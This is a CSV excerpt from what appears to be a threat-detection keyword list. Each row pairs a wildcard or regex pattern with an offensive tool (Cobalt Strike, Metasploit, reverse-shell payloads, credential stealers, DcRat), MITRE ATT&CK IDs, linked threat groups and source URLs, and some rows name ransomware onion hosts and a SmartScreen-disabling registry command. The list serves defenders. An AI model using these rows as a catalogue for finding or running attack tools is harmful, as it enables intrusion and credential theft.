"*OpenVPN/SOCKS extension initialized.*",".{0,1000}OpenVPN\/SOCKS\sextension\sinitialized\..{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","53976"
"*openvpn_stealer*",".{0,1000}openvpn_stealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","53977"
"*openwall.John.appdata.xml*",".{0,1000}openwall\.John\.appdata\.xml.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53978"
"*openwall.John.desktop*",".{0,1000}openwall\.John\.desktop.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53979"
"*openwall/john*",".{0,1000}openwall\/john.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53980"
"*openWindowsExecutableStage*",".{0,1000}openWindowsExecutableStage.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53981"
"*OperaPassView.exe*",".{0,1000}OperaPassView\.exe.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53985"
"*Operative Framework*",".{0,1000}Operative\sFramework.{0,1000}","offensive_tool_keyword","Operative Framework","Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0007 - TA0011 - TA0007","N/A","N/A","Framework","https://github.com/graniet/operative-framework","1","0","N/A","N/A","N/A","8","706","168","2024-09-30T02:55:39Z","2017-01-03T08:38:59Z","53986"
"*OPERATORCHANGEMEPLZZZ*",".{0,1000}OPERATORCHANGEMEPLZZZ.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","#content","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","53987"
"*ophcrack*",".{0,1000}ophcrack.{0,1000}","offensive_tool_keyword","ophcrack","Windows password cracker based on rainbow tables.","T1110.003 - T1555.003 - T1110.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://gitlab.com/objectifsecurite/ophcrack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53988"
"*o-printernightmare.ps1*",".{0,1000}o\-printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","53989"
"*options.bruteforced_protocol*",".{0,1000}options\.bruteforced_protocol.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","53990"
"*Options.shadowCredCertificatePassword*",".{0,1000}Options\.shadowCredCertificatePassword.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","53991"
"*optiv/Ivy.git*",".{0,1000}optiv\/Ivy\.git.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","53992"
"*optiv/Registry-Recon*",".{0,1000}optiv\/Registry\-Recon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","N/A","10","10","325","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z","53993"
"*optiv/ScareCrow*",".{0,1000}optiv\/ScareCrow.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","53994"
"*optiv/ScareCrow*",".{0,1000}optiv\/ScareCrow.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","53995"
"*oqwygprskqv65j72.13gpqd.top*",".{0,1000}oqwygprskqv65j72\.13gpqd\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53996"
"*oqwygprskqv65j72.1hbdbx.top*",".{0,1000}oqwygprskqv65j72\.1hbdbx\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53997"
"*oqwygprskqv65j72.1jfniy.top*",".{0,1000}oqwygprskqv65j72\.1jfniy\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53998"
"*oqwygprskqv65j72.1jitcy.top*",".{0,1000}oqwygprskqv65j72\.1jitcy\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53999"
"*oqwygprskqv65j72.1ldyev.top*",".{0,1000}oqwygprskqv65j72\.1ldyev\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54000"
"*oqwygprskqv65j72.onion*",".{0,1000}oqwygprskqv65j72\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54001"
"*oracle_default_hashes.txt*",".{0,1000}oracle_default_hashes\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54002"
"*oracle_default_passwords.csv*",".{0,1000}oracle_default_passwords\.csv.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54003"
"*Orange-Cyberdefense/arsenal*",".{0,1000}Orange\-Cyberdefense\/arsenal.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","54004"
"*Orange-Cyberdefense/KeePwn*",".{0,1000}Orange\-Cyberdefense\/KeePwn.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","54005"
"*Orange-Cyberdefense/KeePwn*",".{0,1000}Orange\-Cyberdefense\/KeePwn.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","54006"
"*Orange-Cyberdefense/LinikatzV2*",".{0,1000}Orange\-Cyberdefense\/LinikatzV2.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","54007"
"*orbitaldump.py*",".{0,1000}orbitaldump\.py.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","54008"
"*orbitaldump/orbitaldump*",".{0,1000}orbitaldump\/orbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","54009"
"*orc_loadURL 'https://gtfobins.github.io*",".{0,1000}orc_loadURL\s\'https\:\/\/gtfobins\.github\.io.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","54010"
"*OrderFromC2 = ReadEmail()*",".{0,1000}OrderFromC2\s\=\sReadEmail\(\).{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","54011"
"*os.system('reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"" /v ""EnableSmartScreenFilter"" /t REG_DWORD /d ""0"" /f')*",".{0,1000}os\.system\(\'reg\sadd\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\sSettings\""\s\/v\s\""EnableSmartScreenFilter\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f\'\).{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#registry","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","54013"
"*OS-Command-Injection-Unix-Payloads.*",".{0,1000}OS\-Command\-Injection\-Unix\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","54014"
"*OS-Command-Injection-Windows-Payloads.*",".{0,1000}OS\-Command\-Injection\-Windows\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","54015"
"*OSCP-Archives*",".{0,1000}OSCP\-Archives.{0,1000}","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043  - ","N/A","N/A","Exploitation tool","https://github.com/CyDefUnicorn/OSCP-Archives","1","1","N/A","N/A","N/A","7","620","194","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z","54016"
"*osmedeus cloud*",".{0,1000}osmedeus\scloud.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54021"
"*osmedeus health*",".{0,1000}osmedeus\shealth.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54022"
"*osmedeus provider*",".{0,1000}osmedeus\sprovider.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54023"
"*osmedeus scan*",".{0,1000}osmedeus\sscan.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54024"
"*osmedeus utils*",".{0,1000}osmedeus\sutils.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54025"
"*osx/dump_keychain*",".{0,1000}osx\/dump_keychain.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54026"
"*osx/x64/meterpreter/reverse_tcp*",".{0,1000}osx\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54027"
"*osx/x64/meterpreter_reverse_tcp*",".{0,1000}osx\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54028"
"*osx/x64/shell_reverse_tcp*",".{0,1000}osx\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54029"
"*osx_gatekeeper_bypass.*",".{0,1000}osx_gatekeeper_bypass\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54030"
"*OtterHacker/SetProcessInjection*",".{0,1000}OtterHacker\/SetProcessInjection.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","54031"
"*OU=qwqdanchun*",".{0,1000}OU\=qwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","54032"
"*ourtn-ftshell-upcommand*",".{0,1000}ourtn\-ftshell\-upcommand.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","54033"
